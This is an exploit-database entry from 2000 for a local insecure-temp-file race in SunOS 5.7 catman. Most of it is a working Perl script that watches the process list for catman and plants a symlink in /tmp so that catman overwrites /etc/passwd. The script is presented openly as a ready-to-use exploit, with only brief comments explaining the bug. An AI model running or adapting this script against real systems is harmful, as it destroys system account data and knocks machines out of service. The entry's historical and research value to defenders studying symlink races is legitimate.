SunOS 5.7 Catman - Local Insecure tmp Symlink Clobber Exploit

2000-12-20T00:00:00
ID 1337DAY-ID-5807
Type zdt
Reporter lwc
Modified 2000-12-20T00:00:00

Description

Exploit for solaris platform in category dos / poc

                                        
                                            =============================================================
SunOS 5.7 Catman - Local Insecure tmp Symlink Clobber Exploit
=============================================================


#!/usr/local/bin/perl -w 
#
# The problem is catman creates files in /tmp
# insecurly. They are based on the PID of the
# catman process, catman will happily clobber
# any files that  are symlinked to that file.
# The idea of this  script  is  to  watch the
# process  list  for  the catman process, get
# the pid and Create a symlink in /tmp to our
# file to be clobbered.  This exploit depends
# on  system  speed  and  process  load. This
# worked on a patched Solaris 2.7 box (August
# 2000 patch cluster)
# SunOS rootabega 5.7 Generic_106541-12 sun4u
# sparc SUNW,Ultra-1 [email protected]
# 11/21/2000   Vapid Labs.
# http://vapid.betteros.org

$clobber = "/etc/passwd";
while(1) {
  open ps,"ps -ef | grep -v grep |grep -v PID |";
  while(<ps>) {
    @args = split " ", $_;
    if (/catman/) { 
      print "Symlinking sman_$args[1] to  $clobber\n";
      symlink($clobber,"/tmp/sman_$args[1]");
      exit(1);
    }
  }
}




#  0day.today [2018-01-01]  #